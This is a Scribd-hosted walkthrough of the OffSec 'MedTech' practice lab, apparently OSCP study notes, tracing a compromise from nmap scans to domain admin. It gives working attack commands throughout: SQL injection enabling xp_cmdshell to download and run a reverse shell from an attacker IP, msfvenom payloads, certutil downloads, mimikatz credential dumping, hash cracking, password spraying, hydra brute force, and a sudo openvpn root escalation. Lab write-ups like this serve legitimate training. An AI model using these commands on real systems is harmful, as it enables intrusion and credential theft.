Scribd
Upload
1K views8 pages

Medtech Notes - MD

The document details a penetration testing process involving multiple network scans using Nmap to identify open ports and services on various IP addresses. It describes exploiting vulnerabilities, including SQL injection and privilege escalation, to gain unauthorized access and retrieve sensitive information. The testing progresses through various systems, culminating in root access on a VPN server, with evidence of successful exploits documented throughout.

Uploaded by

Muhammad Mughal
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
1K views8 pages

Medtech Notes - MD

The document details a penetration testing process involving multiple network scans using Nmap to identify open ports and services on various IP addresses. It describes exploiting vulnerabilities, including SQL injection and privilege escalation, to gain unauthorized access and retrieve sensitive information. The testing progresses through various systems, culminating in root access on a VPN server, with evidence of successful exploits documented throughout.

Uploaded by

Muhammad Mughal
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 8

###### Topology

![[medtec-Topology2.png]]

```bash
nmap -sn 192.168.156.0/24 -v -oG nmap/pingsweet.txt
```

![[Medtech-01-Ping-Sweep.png]]

```bash
nmap -p- -sCV -A 192.168.156.120 --open -oG nmap/192.168.156.120-fullscan.txt
```
![[Medtech-02-192.168.156.120-Full-Scan 1.png]]
```plaintext
nmap -p- -sCV -A 192.168.156.120 --open -oG nmap/192.168.156.120-fullscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 23:51 EDT
Nmap scan report for 192.168.156.120
Host is up (0.061s latency).
Not shown: 64769 closed tcp ports (conn-refused), 764 filtered tcp ports (no-
response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 84:72:7e:4c:bb:ff:86:ae:b0:03:00:79:a1:c5:af:34 (RSA)
| 256 f1:31:e5:75:31:36:a2:59:f3:12:1b:58:b4:bb:dc:0f (ECDSA)
|_ 256 5a:05:9c:fc:2f:7b:7e:0b:81:a6:20:48:5a:1d:82:7e (ED25519)
80/tcp open http WEBrick httpd 1.6.1 (Ruby 2.7.4 (2021-07-07))
|_http-title: PAW! (PWK Awesome Website)
|_http-server-header: WEBrick/1.6.1 (Ruby/2.7.4/2021-07-07)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

whatweb http://192.168.156.120/
http://192.168.156.120/ [200 OK] Country[RESERVED][ZZ], HTML5,
HTTPServer[WEBrick/1.6.1 (Ruby/2.7.4/2021-07-07)], IP[192.168.156.120], Open-Graph-
Protocol[website], Ruby[2.7.4,WEBrick/1.6.1], Script[application/ld+json],
Title[PAW! (PWK Awesome Website)]

```

```bash
nmap -p- -sCV -A 192.168.156.121 --open -oG nmap/192.168.156.121-fullscan.txt
```

```plaintext
nmap -p- -sCV -A 192.168.156.121 --open -oG nmap/192.168.156.121-fullscan.txt

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 23:46 EDT


Nmap scan report for 192.168.156.121
Host is up (0.064s latency).
Not shown: 64280 closed tcp ports (conn-refused), 1241 filtered tcp ports (no-
response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: MedTech
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-09-23T03:47:36
|_ start_date: N/A

whatweb http://192.168.156.121/
http://192.168.156.121/ [200 OK] ASP_NET[4.0.30319], Bootstrap, Country[RESERVED]
[ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[192.168.156.121], JQuery[1.12.4],
Meta-Author[Offensive Security], Microsoft-IIS[10.0], Modernizr[3.5.0.min], Script,
Title[MedTech][Title element contains newline(s)!], X-Powered-By[ASP.NET], X-UA-
Compatible[ie=edge]

```

```bash
nmap -p- -sCV -A 192.168.156.122 --open -oG nmap/192.168.156.122-fullscan.txt
```

![[Medtech-04-192.168.156.122-Full-Scan 1.png]]

```plaintext
nmap -p- -sCV -A 192.168.156.122 --open -oG nmap/192.168.156.122-fullscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-22 23:52 EDT
Nmap scan report for 192.168.156.122
Host is up (0.072s latency).
Not shown: 63558 closed tcp ports (conn-refused), 1975 filtered tcp ports (no-
response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 60:f9:e1:44:6a:40:bc:90:e0:3f:1d:d8:86:bc:a9:3d (ECDSA)
|_ 256 24:97:84:f2:58:53:7b:a3:f7:40:e9:ad:3d:12:1e:c7 (ED25519)
1194/tcp open openvpn?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

```bash
nmap -p- -sCV -A 192.168.156.254 --open -oG nmap/192.168.156.254-fullscan.txt
```
![[Medtech-05-192.168.156.254-Full-Scan.png]]

Found webserver with error based blind sql injection with 2 columns in MSSQL
database
![[Medtech-06-WEB02-SQL.png]]

```cmd
'; EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE
sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- -

msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.45.182 LPORT=4444 -f exe -o


shell.exe

'; EXECUTE xp_cmdshell "powershell.exe wget http://192.168.45.182/shell.exe -


OutFile c:\Users\Public\shell.exe" -- -

'; EXECUTE xp_cmdshell "c:\Users\Public\shell.exe" -- -

```

got reverse shell![[Medtech-07-WEB02-Reverse-shell.png]]


After downloading winpeas64.exe to WEB02

```bash
python3 -m http.server 80

certutil -urlcache -split -f http://192.168.45.182/win.exe win.exe


```

Got
![[Medtech-08-WEB02-Priv.png]]

Downloaded exploit PrintSpoofer from https://github.com/itm4n/PrintSpoofer/releases


moved it to print.exe and uploaded it on WEB02

```bash
python3 -m http.server 80

certutil -urlcache -split -f http://192.168.45.182/print.exe print.exe

print.exe -i -c cmd
```

And got a nt authority proof.txt-1

![[Medtech-09-WEB02-Proof-Txt 1.png]]
After uploading running mimikatz we get passwords for user joe:Flowers1 and hash
for offsec:lab which when cracked we get lab

```cmd
certutil -urlcache -split -f http://192.168.45.198/mimikatz.exe mimi.exe

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"


```

![[Medtech-10-WEBO2-Joe-Pass.png]]

```bash
hashcat -m 1000 2892d26cdf84d7a70e2eb3b9f05c425e /usr/share/wordlists/rockyou.txt
-r /usr/share/hashcat/rules/best64.rule --force
```

###### moving to Files02 172.16.135.11


connect with ceacked hash

```bash
evil-winrm -i 172.16.135.11 -u joe -p Flowers1 -s
/home/kali/oscp/medtech-labs/WEBO2
```

![[Medtech-12-FILES02-winrm.png]]

local.txt
![[Medtech-13-FILES02-localtxt 1.png]]

Proof.txt-2
![[Medtech-14-FILES02-PROOFTXT 1.png]]

Found fileMonitorBackup.log on FILES02 downloaded it to kali and found ntlm hashes


for users
![[Medtech-15-FILES02-daisy-hash.png]]
![[Medtech-16-FILES02-toad-hash.png]]
![[Medtech-17-FILES02-wario-hash.png]]
![[Medtech-18-FILES02-gomba-hash.png]]
cracked warios ntlm and sprayed it into the network
```bash
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --force

netexec winrm 172.16.230.0/24 -u wario -p Mushroom!


```

![[Medtech-19-FILES02-wario-crack.png]]

![[Medtech-20-CLIENT01-wario-access.png]]

###### moving to CLIENT02 172.16.230.83


```bash
evil-winrm -i 172.16.230.83 -u wario -p Mushroom! -s /home/kali/oscp/medtech-labs
```
found local.txt on the user desktop
![[Medtech-21-CLIENT01-wario-localtxt.png]]

uploaded winpeas and ran it and found possible dll haiack

![[Medtech-22-CLIENT01-wario-privesc.png]]

generated reverse shell uploaded it


```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.198 LPORT=4445 -f exe -o
add.exe
```

replaced the service with


```powershell
sc.exe start auditTracker
```
![[Medtech-23-CLIENT01-PRIVESC-service.png]]
caught reverse shell
```bash
rlwrap nc -nvlp 4445
```

and I am nt authority proof.txt-3


![[Medtech-24-CLIENT01-Proof-txt.png]]
###### moving to DEV04 172.16.135.12
password spraing i found rdp access user yoshi
![[Medtech-25--Dev04-yoshi-access 1.png]]
rpd access
```bash
xfreerdp /u:yoshi /p:"Mushroom\!" /v:172.16.230.12 /drive:/home/kali/oscp/medtech-
labs /size:1920x1080 /smart-sizing /cert-ignore +clipboard
```

found local.txt on desktop -- screen shot


uploaded winpeas found backup.exe as privesc vector if no coloruse

```cmd
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1
win.exe
```

![[Medtech-26--Dev04-yoshi-privesc.png]]

write and execute perms


```powershell
icacls "C:\TEMP\backup.exe"
```
![[Medtech-27--Dev04-yoshi-privesc-permissions.png]]

payload
```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.198 LPORT=4445 -f exe -o
4445.exe
```

started listner
```bash
rlwrap nc -nvlp 4445
```

on windows dev04
```powershell
move C:\TEMP\backup.exe backup.exe

move ./4445.exe C:\TEMP\backup.exe


. .\backup.exe
```

got nt authority system proof.txt-4


![[Medtech-28--Dev04-proof-txt.png]]
uploaded mimikatz found leon password rabbit:)
![[Medtech-29--Dev04-leon-pass.png]]Leon is a domain admin
![[Medtech-30-Dev04-leon-domain-admin.png]]

###### Moving to ClLIENT01 172.16.230.82

using netexec
```bash
netexec rdp 172.16.230.0/24 -u leon -p "rabbit:)"
```
![[Medtech-31-Client01-netexec-rdpaccess.png]]

rdp into client01 with leon


```bash
xfreerdp /u:leon /p:"rabbit:)" /v:172.16.230.82 /drive:/home/kali/oscp/medtech-
labs /size:1920x1080 /smart-sizing /cert-ignore +clipboard
```

and am domain admin so proof.txt-5


![[Medtech-32-Client01-proof-txt.png]]
###### moving to PROD01 172.16.230.13

as domain admin I can


![[Medtech-33-Prod01-winrm-access.png]]

```bash
evil-winrm -i 172.16.230.13 -u leon -p "rabbit:)" -s /home/kali/oscp/medtech-
labs/FILES02
```

and proof.txt-6
![[Medtech-34-Prod01-Proof-Txt.png]]

###### moving to dc01 172.16.230.10


```bash
evil-winrm -i 172.16.230.10 -u leon -p "rabbit:)" -s /home/kali/oscp/medtech-
labs/FILES02
```

proof.txt-7
![[Medtech-35-DC01-Proof-Txt.png]]

###### Moving to VPN 192.168.230.122


used hydra to crack ssh pass for 192.168.230.122
```bash
hydra -l offsec -P /usr/share/wordlists/rockyou.txt ssh://192.168.230.122
```

![[Medtech-36-122-offsec-password-hydra.png]]

found password for offsec:password


```bash
ssh [email protected]
```

```bash
sudo -l
```

![[Medtech-37-122-offsec-sudo.png]]
can run openvpn

```bash
sudo openvpn --dev null --script-security 2 --up '/bin/sh -c sh'

python3 -c 'import pty; pty.spawn("/bin/bash")'


```

And I am root proof.txt-8


![[Medtech-39-122-Proof-Txt.png]]

found mario id_rsa

![[Medtech-40-122-mario-ssh-id-rsa.png]]

![[Medtech-41-122-mario-ssh-id-rsa.png]]
copied it and saved to kali
###### Moving to NTP 172.16.230.14

```bash
chmod 600 id_rsa

ssh -i id_rsa [email protected]


```

found local.txt
![[Medtech-42-NTP-14-local-txt.png]]

###### Moving to WEB01 192.168.230.120

netexec to offsec password found ealier


![[Medtech-43-WEB01-netexec-access.png]]

```bash
ssh [email protected]
```

```bash
sudo -l
```
![[Medtech-44-WEB01-sudo-priv.png|1000]]
```bash
sudo -i
```
Proof.txt-9
![[Medtech-45-WEB01-proof-txt.png]]

You might also like